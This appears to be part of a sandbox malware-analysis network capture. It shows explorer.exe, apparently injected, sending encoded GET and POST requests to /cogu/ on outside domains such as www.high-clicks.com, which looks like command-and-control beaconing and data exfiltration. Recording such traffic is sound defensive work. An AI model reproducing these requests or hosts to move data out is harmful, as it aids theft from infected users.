Oct 13, 2021 15:53:21.421292067 CEST	8302	OUT	Data Raw: 58 71 6e 64 34 58 31 72 53 79 78 31 46 73 46 57 2d 64 58 68 67 62 71 46 6b 50 57 7e 46 37 55 6b 47 65 76 57 38 41 2d 74 41 34 63 55 39 43 6b 73 42 61 4a 6b 41 4e 6e 73 44 76 54 4b 4a 64 45 41 37 32 67 54 4c 39 52 4e 6f 69 31 41 73 41 4e 30 77 4f Data Ascii: Xqnd4X1rSyx1FsFW-dXhgbqFkPW~F7UkGevW8A-tA4cU9CksBaJkANnsDvTKJdEA72gTL9RNoi1AsAN0wO2u5uYsKxi7BNg3MXgTMZyKfk6OlxqTw5xvA5CTnBjFRdI~tGIrV6cVpXD8fmsLOMVkPyxxWvlwmU16hKeP5XZE9aDiFE-RRZ9aI5ODhdbcH0J4YV72-ojRQlfDULLB5GnIGB7lJyw4Z~r1hN9CUPuiIQc~0M0Wtrk
Oct 13, 2021 15:53:21.421423912 CEST	8316	OUT	Data Raw: 67 5a 43 35 64 45 4c 74 6e 35 72 45 67 68 4d 4c 73 69 50 59 74 44 66 73 6e 4c 4c 31 55 51 77 7a 4d 75 48 5a 41 62 46 38 70 54 52 76 5f 73 64 62 6c 67 36 64 75 54 38 39 59 45 78 51 31 68 33 6d 4b 58 7a 7e 54 28 39 75 4f 48 53 41 69 42 70 45 57 6d Data Ascii: gZC5dELtn5rEghMLsiPYtDfsnLL1UQwzMuHZAbF8pTRv_sdblg6duT89YExQ1h3mKXz~T(9uOHSAiBpEWmzpy2ZjHV1(fjUrASxbI867jQCDaZi2QOY4joeOvuzo8BD1BENMQSroR(NA8K3yLX-CGG91F(lp046QfoNvIgjfWt7i0MCRcZrQsIhCLL4bDRs8X~HjDstozB1g6ZoIUCVdZkisKAKpO2nhVaUyIBp(POLD4Lsqp74
Oct 13, 2021 15:53:21.421591043 CEST	8322	OUT	Data Raw: 30 6b 33 34 6c 50 43 4c 57 34 46 4f 39 54 69 74 4d 64 59 39 2d 34 50 49 66 53 73 46 45 77 4e 71 51 56 63 6f 79 4b 4c 5a 59 48 49 63 63 63 6f 68 63 4f 49 70 48 44 4d 59 42 4c 6d 76 53 44 74 4b 63 28 36 36 47 53 4b 73 39 79 30 30 74 57 71 70 4e 34 Data Ascii: 0k34lPCLW4FO9TitMdY9-4PIfSsFEwNqQVcoyKLZYHIcccohcOIpHDMYBLmvSDtKc(66GSKs9y00tWqpN4qM7GqpTB6x70CP4cDIbAf1SCxVnvAFzWTqsFI9MYGlP9iQUG2xFtidTMcyrQhfWWxaz9Z7eKDL5uMwesTKa(N03dVDUTkgvGrsA0plxesftGjgA7eESxZ8ncyaavw3NC2ryotIsyHa-xs4MhfLhcGTN7oeuKFzWVw
Oct 13, 2021 15:53:21.516879082 CEST	8328	OUT	Data Raw: 7a 6e 43 6f 4b 42 61 34 4e 58 45 41 79 47 79 7e 30 28 5f 4a 56 65 6a 4e 67 57 4e 57 42 32 6d 36 59 33 4a 50 6d 6f 72 35 4e 28 77 55 36 43 71 59 73 6b 56 59 6e 49 33 4c 41 42 7a 74 31 32 38 31 53 6b 44 68 61 4f 35 4b 4d 7a 58 28 47 36 6a 55 7a 4c Data Ascii: znCoKBa4NXEAyGy~0(_JVejNgWNWB2m6Y3JPmor5N(wU6CqYskVYnI3LABzt1281SkDhaO5KMzX(G6jUzLv9cciu33jVh3gpRJWh3KZWbNs5rTSjJauxS~q4vWF1f~9~JVYuX34GZUnO829GDz0ZTMdnvI-xNlGy3oJdgTLs535yz8rTWVu87EZMBrkHnQbDb18ph5oetIn6Dub9q0plul1Ja6Uah2_uxU8BUCb6_Hlp2s8S-5r
Oct 13, 2021 15:53:21.517056942 CEST	8335	OUT	Data Raw: 4c 4a 59 69 62 28 33 33 4b 35 36 72 32 79 46 46 62 6f 76 4e 67 78 73 7e 6d 76 44 57 46 51 68 73 7a 6b 72 74 39 4b 77 6b 7a 54 4b 57 78 71 6f 47 6d 50 36 45 79 7a 30 4b 59 46 67 30 74 69 33 61 37 31 54 6b 50 30 61 57 31 74 71 65 75 30 6d 43 33 30 Data Ascii: LJYib(33K56r2yFFbovNgxs~mvDWFQhszkrt9KwkzTKWxqoGmP6Eyz0KYFg0ti3a71TkP0aW1tqeu0mC30V(3JPeCJFsZorQG0mVOTlVqnP7CUWbeG64RjcrSJZ7nR_87~8RNoIYdLZAX~Qf85zYo4XumX9Lygh5N7GPXQ4SmmX6a~s4aDB~364Anp1vLfegKO7vOtrE4nmEkKIDWrAHedigSnfK5GnkSfeYZnovlQgE-PADO1Y
Oct 13, 2021 15:53:21.517232895 CEST	8340	OUT	Data Raw: 46 44 66 6e 6b 6d 77 56 65 79 57 42 48 44 47 57 46 70 58 5a 6e 55 37 67 4e 66 2d 46 2d 73 63 4f 77 6f 39 45 6d 34 34 31 72 35 63 62 55 7a 42 77 53 38 65 56 57 41 4e 66 2d 48 72 76 45 62 4e 47 51 4a 59 63 6e 77 62 66 64 41 35 56 6c 64 48 51 59 75 Data Ascii: FDfnkmwVeyWBHDGWFpXZnU7gNf-F-scOwo9Em441r5cbUzBwS8eVWANf-HrvEbNGQJYcnwbfdA5VldHQYub1IlJDnF7xioL42T7eGeDzGQ980E_Dghb0v1OMP~rVk~2jBz-ANuw3RHuGu8ZnclUmCF1apCaH7Z1qfqJNvg0FZCUF1A9KFWWL_~vB51K9uaWEINfT2Iy3RwLkflbzf6x4M3s1rfpIIb2BnYtxtmoiFi2AYnYKb6i
Oct 13, 2021 15:53:21.517596960 CEST	8360	OUT	Data Raw: 50 32 65 69 33 78 58 72 5a 4f 62 65 74 4d 36 7a 2d 28 61 44 47 76 58 4d 45 28 6c 7e 43 39 77 42 4e 6a 50 55 38 47 46 67 6c 28 68 76 43 53 43 59 39 56 41 73 50 54 38 46 5f 4b 57 78 5a 79 72 79 48 4d 31 4a 4a 48 36 59 43 43 46 55 58 79 4c 59 52 48 Data Ascii: P2ei3xXrZObetM6z-(aDGvXME(l~C9wBNjPU8GFgl(hvCSCY9VAsPT8F_KWxZyryHM1JJH6YCCFUXyLYRHEGjR6b3JHpmLT57s8TIzZyOo4v6jcq7fmocs8ssYYORKxlb8AWHHkarV02Zi1MsXa(spxziyfkfYON5jAZT1X9vPTKxfCOyEHi9T0TD9DlMoRN5cPpTK-bFs0hJGlgqvs0QYd72bRq5Nj6MGlhfBeZwSmwAvck3tH
Oct 13, 2021 15:53:21.517714024 CEST	8364	OUT	Data Raw: 58 73 78 4a 59 65 64 31 55 78 48 6f 33 47 37 6d 5f 7a 78 65 33 7e 51 4a 51 67 34 73 70 50 55 36 4f 39 61 54 6c 31 66 4a 56 74 72 62 64 44 62 42 79 66 35 5a 37 39 4f 44 5a 45 68 55 53 42 56 47 42 78 4c 57 69 5a 62 4b 73 37 4f 37 57 6f 76 6c 37 45 Data Ascii: XsxJYed1UxHo3G7m_zxe3~QJQg4spPU6O9aTl1fJVtrbdDbByf5Z79ODZEhUSBVGBxLWiZbKs7O7Wovl7EANQXpJ5YZtNH60TL6DbVrvnP_USdX3vqhl5yLHAcn~ERoS9LcgQAUpOw1vlpWdHLQASi4D2K8p6E4H5yUVDNclMjNRaPMvp2f05KTesEJ5qQH5DOWlg6JdJ5LJJk5nFzBXwYmc51fqbq7JIXVXqgziLUCuK0LBhbI
Oct 13, 2021 15:53:21.517900944 CEST	8375	OUT	Data Raw: 66 41 56 52 76 37 6f 30 74 43 4c 72 6c 48 79 38 7a 28 41 72 30 58 50 28 38 44 64 50 53 74 38 34 56 70 68 33 79 53 67 76 6b 41 42 76 35 58 4b 43 74 35 2d 72 47 28 39 47 6c 28 77 68 52 34 72 7a 72 30 6a 38 4b 58 4a 53 47 70 62 6b 41 31 5a 4c 69 4b Data Ascii: fAVRv7o0tCLrlHy8z(Ar0XP(8DdPSt84Vph3ySgvkABv5XKCt5-rG(9Gl(whR4rzr0j8KXJSGpbkA1ZLiKVaaEZwpFpgadZ67K4hDuaobQoJ2Z32EX3gNN0MEnlfa35yQ6LrI11AbFgEUlmztvByAYGwo0vnX8Nw7NATk69XWWvAcph2fGvlLfcWesaC5HID5bPrD4LlL(2CIncfi8lv1d-gRPSPGdYh6a0(C2uOVE9QSt58Xmq
Oct 13, 2021 15:53:21.774180889 CEST	8416	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Oct 2021 13:53:21 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.11.20	49853	66.96.130.148	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:21.416311979 CEST	8295	OUT	GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1 Host: www.fishermandm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:53:21.527144909 CEST	8376	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Oct 2021 13:53:21 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.11.20	49854	192.64.116.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:26.696922064 CEST	8430	OUT	POST /cogu/ HTTP/1.1 Host: www.high-clicks.com Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.high-clicks.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.high-clicks.com/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 72 62 31 33 34 4c 4c 5a 69 4a 71 65 45 7a 6c 79 59 66 75 38 49 66 28 52 4b 54 55 49 72 46 46 66 48 7a 6b 31 6e 45 59 6f 4d 4d 66 63 45 59 46 6c 30 52 36 64 37 74 58 74 58 6f 28 50 6d 4a 44 52 35 73 47 42 4d 76 5a 47 65 71 56 67 56 39 56 6b 46 31 50 72 39 5f 57 6e 6d 63 67 68 6a 52 34 4e 61 4d 7e 61 35 6f 5a 76 4e 62 54 70 35 57 64 5a 59 50 57 4c 33 30 7e 59 43 68 57 37 38 33 6f 71 59 36 59 70 6e 74 33 32 51 42 51 34 78 73 78 4c 32 52 37 32 68 67 4a 65 64 48 45 70 4f 32 51 68 4d 57 65 31 43 5a 63 75 51 66 6b 4a 37 6b 47 44 33 52 6f 54 6d 64 56 47 31 30 58 50 68 5f 56 49 52 50 4c 75 4c 68 4b 4f 63 68 42 41 47 75 6e 75 52 49 6a 57 69 71 6f 76 6d 47 53 48 77 70 4e 61 73 70 37 58 64 61 6d 4b 54 36 47 48 31 5f 34 59 41 31 78 4f 55 39 49 44 50 47 34 4a 4d 44 75 67 6c 58 58 56 5a 46 28 63 7a 4e 5a 77 4b 38 67 4f 6e 32 64 59 70 36 4a 43 76 50 62 42 6e 75 75 61 33 39 45 30 77 4f 7e 6e 6b 34 74 7a 34 2d 71 63 32 63 63 38 35 6a 5a 54 34 6d 4d 77 72 79 73 4c 68 49 64 69 49 7a 31 5f 66 42 72 7a 38 54 49 70 51 70 73 48 4c 42 6e 64 42 56 4f 2d 34 76 72 37 70 36 4c 51 45 57 64 4a 41 30 44 5a 35 57 50 6a 62 73 71 42 4c 74 63 68 7a 58 70 43 63 44 65 48 42 36 76 6b 4e 4f 4e 47 44 5f 28 6e 43 4f 65 46 44 54 4b 61 79 68 64 4b 46 47 74 31 28 4a 61 4b 33 38 75 4b 38 67 69 64 47 6b 78 79 6d 41 53 75 64 6d 73 33 4c 4b 36 7a 62 54 73 59 54 64 71 47 6d 35 6a 5a 4c 45 39 33 54 6f 50 33 64 50 44 4b 45 4e 31 2d 6a 44 52 78 72 68 66 78 7e 61 4c 57 53 32 65 57 59 6f 34 39 52 5a 4a 34 58 67 4d 4f 67 6f 63 63 45 77 6d 68 74 6b 39 73 46 57 50 48 5a 71 75 5a 79 53 66 72 32 51 70 2d 52 58 79 4a 30 54 64 48 53 74 35 61 74 7a 75 4e 48 53 6f 6e 53 57 63 5a 35 57 65 31 79 5a 6b 64 6a 6a 66 35 4a 5a 68 6e 75 6d 6b 76 50 5f 71 66 28 2d 79 70 53 71 7a 2d 6f 39 30 4d 57 77 52 37 4c 38 6b 39 77 39 7a 6b 78 4b 78 4d 74 31 4c 4c 66 37 75 79 70 78 59 2d 56 71 7a 6b 67 63 6c 67 7a 4c 52 73 65 58 6c 43 58 35 4b 6f 4e 53 67 36 61 77 6f 5f 52 4c 6e 4a 30 7a 56 2d 31 47 73 76 56 68 61 6e 52 6e 70 74 58 38 6c 6a 66 61 66 4d 47 4f 63 52 44 4a 33 69 43 54 67 49 58 56 42 31 6f 53 55 71 6a 4a 50 74 31 34 50 54 41 7a 70 71 31 65 28 6c 79 69 5a 50 4d 32 69 4e 76 50 4e 43 77 59 49 52 59 4e 52 57 52 73 65 44 78 41 6a 6d 51 65 51 42 54 53 75 41 28 65 62 32 38 66 45 50 45 4a 77 37 7e 66 70 37 54 56 76 69 43 69 30 74 32 35 6e 6f 28 41 48 7a 52 77 4b 46 77 43 70 4f 76 53 52 4d 52 63 36 71 77 36 70 59 30 79 31 36 4e 38 31 6e 49 77 79 38 6d 53 79 77 33 34 46 65 30 69 32 50 54 51 4c 53 75 39 7a 73 49 46 61 71 67 69 7a 4c 5a 67 44 7a 73 66 4f 42 4f 30 46 78 30 49 72 39 76 76 45 56 52 4f 65 37 6c 6e 39 70 4c 6e 37 65 79 76 4d 6f 4c 64 31 49 53 6a 64 67 38 54 6b 49 4f 6f 70 2d 43 79 4c 4c 50 5f 6c 62 4e 39 45 4b 28 57 54 38 30 61 79 76 34 52 63 69 61 6b 30 6f 69 42 46 5a 72 77 55 4f 72 72 48 41 68 75 69 55 56 59 74 48 7e 70 49 72 35 47 51 48 69 66 69 6c 6d 78 69 36 6c 77 43 48 64 41 6b 66 56 6e 4c 71 55 38 61 67 67 6a 55 75 32 70 47 65 41 55 57 63 38 4c 45 54 35 39 32 33 31 75 35 62 38 50 4e 4c 46 64 50 55 28 77 34 69 51 4e 4a 44 28 4d 71 48 28 5f 4c 75 7a 68 65 49 70 53 32 4b 6e 51 38 48 32 48 35 35 75 72 75 6c 77 34 47 53 33 2d 5a 4e 74 79 66 73 45 4f 50 75 6b 6a 36 4e 6a 48 6b 77 50 42 57 71 53 75 37 6f 57 68 42 78 57 4c 5a 38 64 64 6e 6b 47 70 54 70 32 48 28 37 53 63 41 53 4b 6a 38 55 36 50 48 67 6c 30 75 69 6c 43 52 4d 51 4c 69 73 34 4c 45 42 6e 75 45 42 43 6b 66 51 6e 4c 48 34 58 50 56 54 68 64 6f 36 37 71 65 66 45 59 5a 68 71 31 75 5a 67 70 41 65 65 47 41 43 6e 6f 6e 42 5a 4e 73 53 66 77 6c 32 28 77 4c 31 45 6d 55 44 36 63 70 7a 42 67 71 53 6d 46 7e 75 45 2d 64 4c 4b 50 5a 5f 4b 46 39 6f 30 6d 6f 53 34 61 45 6c 6d 48 67 34 34 31 31 59 4c 4a 6a 65 35 44 59 34 53 38 32 65 6b 34 41 4d 58 71 48 66 7a 36 59 59 79 4c 56 71 69 74 38 7a 58 38 37 37 43 57 7a 55 42 61 62 6f 64 2d 74 4d 32 79 6b 55 77 4c 79 77 55 34 50 75 4b 51 56 68 71 56 78 7a 39 57 59 6e 48 6f 73 79 67 78 53 75 7a 4a 33 4d 45 48 56 57 69 49 44 6c 6b 4b 36 59 58 35 4f 36 79 45 72 54 6f 6d 6e 4b 70 54 32 58 74 39 31 75 39 6f 4a 45 4d 41 47 70 32 33 42 4b 51 32 77 56 75 35 56 38 66 51 48 52 57 50 77 53 31 6b 6d 49 Data Ascii: E6=rb134LLZiJqeEzlyYfu8If(RKTUIrFFfHzk1nEYoMMfcEYFl0R6d7tXtXo(PmJDR5sGBMvZGeqVgV9VkF1Pr9_WnmcghjR4NaM~a5oZvNbTp5WdZYPWL30~YChW783oqY6Ypnt32QBQ4xsxL2R72hgJedHEpO2QhMWe1CZcuQfkJ7kGD3RoTmdVG10XPh_VIRPLuLhKOchBAGunuRIjWiqovmGSHwpNasp7XdamKT6GH1_4YA1xOU9IDPG4JMDuglXXVZF(czNZwK8gOn2dYp6JCvPbBnuua39E0wO~nk4tz4-qc2cc85jZT4mMwrysLhIdiIz1_fBrz8TIpQpsHLBndBVO-4vr7p6LQEWdJA0DZ5WPjbsqBLtchzXpCcDeHB6vkNONGD_(nCOeFDTKayhdKFGt1(JaK38uK8gidGkxymASudms3LK6zbTsYTdqGm5jZLE93ToP3dPDKEN1-jDRxrhfx~aLWS2eWYo49RZJ4XgMOgoccEwmhtk9sFWPHZquZySfr2Qp-RXyJ0TdHSt5atzuNHSonSWcZ5We1yZkdjjf5JZhnumkvP_qf(-ypSqz-o90MWwR7L8k9w9zkxKxMt1LLf7uypxY-VqzkgclgzLRseXlCX5KoNSg6awo_RLnJ0zV-1GsvVhanRnptX8ljfafMGOcRDJ3iCTgIXVB1oSUqjJPt14PTAzpq1e(lyiZPM2iNvPNCwYIRYNRWRseDxAjmQeQBTSuA(eb28fEPEJw7~fp7TVviCi0t25no(AHzRwKFwCpOvSRMRc6qw6pY0y16N81nIwy8mSyw34Fe0i2PTQLSu9zsIFaqgizLZgDzsfOBO0Fx0Ir9vvEVROe7ln9pLn7eyvMoLd1ISjdg8TkIOop-CyLLP_lbN9EK(WT80ayv4Rciak0oiBFZrwUOrrHAhuiUVYtH~pIr5GQHifilmxi6lwCHdAkfVnLqU8aggjUu2pGeAUWc8LET59231u5b8PNLFdPU(w4iQNJD(MqH(_LuzheIpS2KnQ8H2H55urulw4GS3-ZNtyfsEOPukj6NjHkwPBWqSu7oWhBxWLZ8ddnkGpTp2H(7ScASKj8U6PHgl0uilCRMQLis4LEBnuEBCkfQnLH4XPVThdo67qefEYZhq1uZgpAeeGACnonBZNsSfwl2(wL1EmUD6cpzBgqSmF~uE-dLKPZ_KF9o0moS4aElmHg4411YLJje5DY4S82ek4AMXqHfz6YYyLVqit8zX877CWzUBabod-tM2ykUwLywU4PuKQVhqVxz9WYnHosygxSuzJ3MEHVWiIDlkK6YX5O6yErTomnKpT2Xt91u9oJEMAGp23BKQ2wVu5V8fQHRWPwS1kmIcPS4U8fEmr(f2sbLWfMZSUujRNhP6UFHX_qYu0NMqkGQ5efvndsfZdDXc2PCt41BhL(NevQMIwTbFS9wiX3_gc4-ovl9SFFuHFShbmpKYzMsp6JG0TiO0arMiy9nXMLg7kRDOsfwCzqhogXM6VniJRC4L9YAQv~TXyhxKL5TbGFbrB(WecsRKk8Pxwa0(Kk_ACQspPuU3BLb6qIg(Es6LM0RUwvgNtcTgH9sQfqLI10tkUGwgqc4TUtVOycnsMqkV2zBnrOm~T4v67FZv1kE3hlrkDKHjQJQY1J6aTx_l7VWnlCBWTbawTOdF0(BFz0L3YJ82hQWCC1L3xUntM79rQEH5E3bKODfA4Xj82p-UgbmmTSgF867NB(DTeFHX_S5DQQ_0Tr2MDLAVdjRqzhXXNRmSG9wuXTSMTRFT-Zbc1IO6RVtfxphAo16TgIoj3SS9oH2jAnSTN2ebIiS6m(d~J3HIB(N(9DByIgm6y8OqIvgjvyhVmJegSiIys4rD_b4iMk12BIPIpM55yxG9sgdU6DuxhRe5G34Yd9Aa5JhLvr9WvdQQWbWjwQ6qUrnHbXmtmBXm6Z9~d4sO5b8IBOZL8r4h9L2zcoTKqy0gNpDfHDI0V4eyYFklQTbAmtMczJgodnsm9jY~603WHgTo1TJxaRQmm47RRqYHf6gbwgw0oumTeg0o2blH0CYQqPRcYX7GEvPfEvK~iSO4qMlqJM7LmonUmS41_A01vPwJHfTtaoeh-KGiOcVXpbhgAkmV1q04aEViussuO1MZFEa0rmYbBfRxsC8JU7vSN40M_w2Tzy3SsVKiCAr7E2jPLAuxmnbeX6AxAmiiaXqnciyBmPXd5BpoUVjAsO0HmWiSrgWVlTImO59uhBmIC8nbNgYnWrQ~c5zTGwbITLnS_5_s5Q_3UTIkLTfvp(vEMxPewXlRCFmP3CS3xqTdrKpa2LD~7XLITJ6z26fI2Y3HQCM7V~UtqaO~rlXhuSPx5O6sQVhAKzO5F2A3EeLojrptUfeyFk6(_b2Vf77cGvhSR7UCH7awknHpjiMxmS9Di4jCiVDpQ7Oj